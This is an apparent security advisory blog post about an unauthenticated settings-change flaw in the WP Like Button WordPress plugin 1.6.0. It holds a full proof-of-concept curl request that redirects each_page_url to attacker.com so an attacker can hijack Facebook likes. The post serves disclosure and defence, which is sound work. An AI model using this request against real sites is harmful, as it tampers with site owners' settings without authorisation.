Security & HackingWebsite Security

WordPress Plugin Like Button Authentication Bypass

WordPress Authentication Bypass

Authentication Bypass Vulnerability in the WP Like Button plugin version 1.6.0 allows unauthenticated attackers to change the settings of the plugin. The contains() function in wp_like_button.php did not check if the current request is made by an authorized user, thus allowing any unauthenticated user to successfully update the settings of the plugin.

Proof of Concept

the curl command below allows an attacker to change the each_page_url parameter to https://attacker.com. This allows the attacker to hijack Facebook likes.

curl -k -i --raw -X POST -d
"page=facebook-like-button&site_url=https%%3A%%2F%%2Flocalhost%%2Fwp&display[]=1&display[]=2&display[]=4&display[]=16&mobile=1&fb_app_id=&fb_app_admin=&kd=0&fblb_default_upload_image=&code_snippet=%%3C%%3Fphp+echo+fb_like_button()%%3B+%%3F%%3E&beforeafter=before&eachpage=url&each_page_url=
https://attacker.com&language=en_US&width=65&position=center&layout=box_count&action=like&color=light&btn_size=small&faces=1&share=1&update_fblb="
"https://localhost/wp/wp-admin/admin.php?page=facebook-like-button&edit=1"
-H "Content-Type: application/x-www-form-urlencoded"

Prevention

No update has been released by the vendor. Users are advised to switch to a different plugin.

Tags
Show More

Related Articles

1
Leave a Reply

Leave a Reply

  Subscribe  
newest oldest most voted
Notify of
trackback

… [Trackback]

[…] Read More: hackersthirdeye.com/wordpress-plugin-like-button-authentication-bypass/ […]

Back to top button
Close
%d bloggers like this: